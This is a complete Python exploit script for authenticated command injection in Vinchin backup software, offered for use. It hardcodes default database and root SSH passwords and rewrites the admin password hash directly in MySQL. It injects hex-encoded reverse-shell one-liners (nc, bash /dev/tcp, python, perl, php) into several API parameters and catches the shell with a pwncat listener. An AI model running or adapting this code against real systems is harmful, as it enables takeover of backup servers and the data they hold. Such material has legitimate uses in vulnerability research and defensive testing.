import re import sys import time import json import random import string import socket import hashlib import requests import binascii import argparse import threading import pwncat.manager import mysql.connector from packaging import version from selenium import webdriver from rich.console import Console from urllib.parse import urlparse from fake_useragent import UserAgent from selenium.webdriver.common.by import By from selenium.webdriver.chrome.options import Options from selenium.webdriver.chrome.service import Service from selenium.webdriver.support.ui import WebDriverWait from webdriver_manager.chrome import ChromeDriverManager from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.support import expected_conditions as EC from requests.packages.urllib3.exceptions import InsecureRequestWarning class VinchinRCE: def __init__( self, url: str, payload: str, username: str, password: str, rshell_ip: str, rshell_port: str, payload_type: str, ): self.url = url self.username = username self.password = password self.old_password = None self.rshell_ip = rshell_ip self.rshell_port = rshell_port self.payload_type = payload_type self.revshell_connected = False self.user_agent = UserAgent().random self.db_user = "vinchin" self.db_password = "yunqi123456" self.db_name = "vinchin_db" self.root_user = "root" self.root_password = "Backup@3R" self.console = Console() self.driver = self.setup_driver() self.payloads = { "nc": f"nc -e /bin/bash {self.rshell_ip} {self.rshell_port}", "bash": f"bash -i >& /dev/tcp/{self.rshell_ip}/{self.rshell_port} 0>&1", "python": ( f"python -c 'import os,pty,socket;" f's=socket.socket();s.connect(("{self.rshell_ip}",{self.rshell_port}));' f"[os.dup2(s.fileno(),f) for f in (0, 1, 2)];" f'pty.spawn("bash")\'' ), "perl": ( f'perl -e \'use Socket;$i="{self.rshell_ip}";$p={self.rshell_port};' f'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));' f"if(connect(S,sockaddr_in($p,inet_aton($i)))){{" f'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");' f'exec("bash -i");}};\'' ), "php": ( f'php -r \'$sock=fsockopen("{self.rshell_ip}",{self.rshell_port});' f'$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);\'' ), } self.payload = self.construct_command(self.payloads[payload]) requests.packages.urllib3.disable_warnings(InsecureRequestWarning) @staticmethod def construct_command(payload: str) -> str: hex_encoded_payload = binascii.hexlify(payload.encode()).decode() formatted_payload = "".join( [ "\\x" + hex_encoded_payload[i : i + 2] for i in range(0, len(hex_encoded_payload), 2) ] ) command = f";echo -e {formatted_payload}|bash;" return command def check_vinchin_version(self, page_html: str) -> None: if page_html is None: self.custom_print("Failed to connect to the target.", "-") sys.exit(1) version_pattern = r"Vinchin build: (\d+\.\d+\.\d+\.\d+)" version_match = re.search(version_pattern, page_html) if not version_match: self.custom_print("Unable to extract version.", "-") sys.exit(1) detected_version = version.parse(version_match.group(1)) self.custom_print(f"Detected Vinchin version: {detected_version}", "*") vulnerable_versions = [ (version.parse("5.0.0"), version.parse("5.1.0")), (version.parse("6.0.0"), version.parse("6.1.0")), (version.parse("6.7.0"), version.parse("6.8.0")), (version.parse("7.0.0"), version.parse("7.3.0")), ] for low, high in vulnerable_versions: if low <= detected_version < high: self.custom_print( f"Vinchin version {detected_version} is vulnerable.", "+" ) return self.custom_print(f"Vinchin version {detected_version} is not vulnerable.", "-") sys.exit(1) def manage_db_password(self, action) -> None: parsed_url = urlparse(self.url) self.db_host = parsed_url.hostname connection = None cursor = None original_hash = None try: connection = mysql.connector.connect( host=self.db_host, user=self.db_user, password=self.db_password, database=self.db_name, connection_timeout=5, ) cursor = connection.cursor() match action: case "change": new_password = "".join( random.choices(string.ascii_letters + string.digits, k=10) ) new_hash = hashlib.md5(new_password.encode()).hexdigest() cursor.execute( "SELECT password FROM bd_user WHERE user_name = %s", (self.username,), ) result = cursor.fetchone() original_hash = result[0] if result else None cursor.execute( "UPDATE bd_user SET password = %s WHERE user_name = %s", (new_hash, self.username), ) self.password = new_password self.old_password = original_hash self.custom_print( f"Password for user '{self.username}' changed to {new_password}.", "+", ) connection.commit() self.login() case "restore": cursor.execute( "UPDATE bd_user SET password = %s WHERE user_name = %s", (self.old_password, self.username), ) self.password = self.old_password self.custom_print( f"Restored the original password for user '{self.username}'.", "+", ) connection.commit() case _: self.custom_print(f"Unknown action: {action}", "-") except mysql.connector.Error as error: self.custom_print(f"Failed to {action} the password: {error}", "-") if action == "change" and original_hash: self.password = original_hash else: self.custom_print( f"Attempting to log in with the original credentials: user={self.username}, password={self.password}", "!", ) self.login() finally: if cursor: cursor.close() if connection and connection.is_connected(): connection.close() def setup_driver(self) -> webdriver.Chrome: self.custom_print("Initializing WebDriver...", "*") self.custom_print("Configuring Chrome options...", "*") options = Options() options.add_argument("--ignore-certificate-errors") options.add_argument("--headless") options.add_argument(f"user-agent={self.user_agent}") self.custom_print("Setting up WebDriver service...", "*") service = Service(ChromeDriverManager().install()) self.custom_print("Launching Chrome browser...", "*") driver = webdriver.Chrome(service=service, options=options) driver.set_window_size(1366, 768) return driver def custom_print(self, message: str, header: str) -> None: header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"} self.console.print( f"[bold {header_colors[header]}][{header}][/bold {header_colors[header]}] {message}" ) def start_listener(self, timeout=30) -> None: with socket.create_server((self.rshell_ip, int(self.rshell_port))) as listener: listener.settimeout(timeout) self.custom_print( f"Waiting for incoming connection on port {self.rshell_port}...", "*" ) try: victim, victim_addr = listener.accept() self.revshell_connected = True self.custom_print( f"Received connection from {victim_addr[0]}:{victim_addr[1]}", "+" ) with pwncat.manager.Manager() as manager: manager.create_session( platform="linux", protocol="socket", client=victim ) self.custom_print("Dropping to pwncat prompt...", "+") manager.interactive() except socket.timeout: self.custom_print( f"No reverse shell connection received within {timeout} seconds.", "-", ) def root_ssh(self) -> None: self.custom_print("Attempting SSH connection...", "*") try: parsed_url = urlparse(self.url) ssh_target = parsed_url.hostname with pwncat.manager.Manager() as manager: manager.create_session( platform="linux", protocol="ssh", host=ssh_target, user=self.root_user, password=self.root_password, timeout=5, ) self.custom_print( "SSH connection successful, entering interactive mode.", "+" ) manager.interactive() return True except Exception as e: self.custom_print(f"SSH connection failed: {e}", "-") return False def login(self) -> None: try: self.driver.get(self.url) page_html = self.driver.page_source self.check_vinchin_version(page_html) self.custom_print("Waiting for the username input field...", "*") username_input = WebDriverWait(self.driver, 10).until( EC.presence_of_element_located((By.NAME, "username")) ) self.custom_print("Waiting for the password input field...", "*") password_input = WebDriverWait(self.driver, 10).until( EC.presence_of_element_located((By.NAME, "password")) ) self.custom_print("Waiting for the submit button...", "*") submit_button = WebDriverWait(self.driver, 10).until( EC.element_to_be_clickable((By.ID, "login-btn")) ) self.custom_print("Sending username and password...", "*") username_input.send_keys(self.username) password_input.send_keys(self.password) self.custom_print("Submitting the form...", "*") submit_button.click() time.sleep(2) error_alert = self.driver.find_element(By.CLASS_NAME, "my_alert") if "display: block;" in error_alert.get_attribute("style"): self.custom_print( "Login failed due to an error alert on the page.", "-" ) sys.exit(1) except NoSuchElementException: self.custom_print("Logged In!", "+") self.manage_db_password("restore") if self.old_password else None self.custom_print(f"Using {self.payload_type} exploitation method !", "+") match self.payload_type: case "setNetworkCardInfo": self.setNetworkCardInfo() case "syncNtpTime": self.syncNtpTime() case "deleteUpdateAPK": self.deleteUpdateAPK() case "getVerifydiyResult": self.getVerifydiyResult() except Exception as e: self.custom_print(f"An error occurred during login: {e}", "-") self.manage_db_password("restore") if self.old_password else None sys.exit(1) def send_http_request(self, function_name: str, params: dict, module: str) -> None: cookies = self.driver.get_cookies() session = requests.Session() cookie_dict = {cookie["name"]: cookie["value"] for cookie in cookies} data = {"m": module, "f": function_name, "p": json.dumps(params)} headers = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": self.user_agent, "Origin": self.url, } try: session.post( f"{self.url}/api/", headers=headers, cookies=cookie_dict, data=data, verify=False, timeout=5, ) except requests.exceptions.Timeout: pass except requests.exceptions.RequestException as e: self.custom_print(f"An error occurred: {e}", "-") def setNetworkCardInfo(self) -> None: self.custom_print("Navigating to system management...", "*") system_link = WebDriverWait(self.driver, 10).until( EC.element_to_be_clickable((By.NAME, "sysmanagement")) ) system_link.click() self.custom_print("Navigating to setting manager...", "*") setting_manager_link = WebDriverWait(self.driver, 10).until( EC.element_to_be_clickable((By.NAME, "setting_manager")) ) setting_manager_link.click() self.custom_print("Navigating to network settings...", "*") network_settings_link = WebDriverWait(self.driver, 10).until( EC.element_to_be_clickable( (By.XPATH, "//a[contains(@href, 'system_network.php')]") ) ) network_settings_link.click() self.custom_print( f"Injecting payload for reverse shell: {self.rshell_ip}:{self.rshell_port}...", "*", ) networkcard_option = WebDriverWait(self.driver, 10).until( EC.presence_of_element_located( (By.XPATH, "//select[@name='networkcard']/option") ) ) self.driver.execute_script( "arguments[0].innerText = arguments[1]", networkcard_option, self.payload ) self.custom_print("Submitting the network settings form...", "*") ok_button = WebDriverWait(self.driver, 15).until( EC.element_to_be_clickable((By.ID, "ipsubmit")) ) ok_button.click() self.custom_print("Check your listener h4x0rm4n...", "+") def syncNtpTime(self) -> None: params = {"ntphost": f"time.nist.gov {self.payload}"} self.send_http_request("syncNtpTime", params, "8") def deleteUpdateAPK(self) -> None: params = {"md5": "h4x0rm4n", "file_name": self.payload} self.send_http_request("deleteUpdateAPK", params, "8") def getVerifydiyResult(self) -> None: params = {"type": "1", "value": f"127.0.0.1 {self.payload}"} self.send_http_request("getVerifydiyResult", params, "14") def main() -> None: parser = argparse.ArgumentParser(description="Authenticated RCE on VinChin 7.2.") parser.add_argument( "-u", "--url", default="https://192.168.1.7", help="URL of the login page", ) parser.add_argument( "-user", "--username", default="admin", help="Username for login" ) parser.add_argument( "-p", "--password", default="123456", help="Password for login" ) parser.add_argument( "-rip", "--rshell_ip", default="192.168.1.5", help="Reverse shell IP address" ) parser.add_argument( "-rport", "--rshell_port", default="1338", help="Reverse shell port" ) parser.add_argument( "--payload_type", default="syncNtpTime", choices=[ "setNetworkCardInfo", "syncNtpTime", "deleteUpdateAPK", "getVerifydiyResult", ], help="Type of payload to send", ) parser.add_argument( "--payload", choices=["nc", "bash", "python", "perl", "php"], default="nc", help="Type of payload to use (choices: 'nc', 'bash', 'python', 'perl', 'php'), default='nc'", ) args = parser.parse_args() vinchin_rce = VinchinRCE( args.url, args.payload, args.username, args.password, args.rshell_ip, args.rshell_port, args.payload_type, ) if not vinchin_rce.root_ssh(): listener_thread = threading.Thread(target=vinchin_rce.start_listener) listener_thread.daemon = True listener_thread.start() vinchin_rce.manage_db_password("change") listener_thread.join() if __name__ == "__main__": main()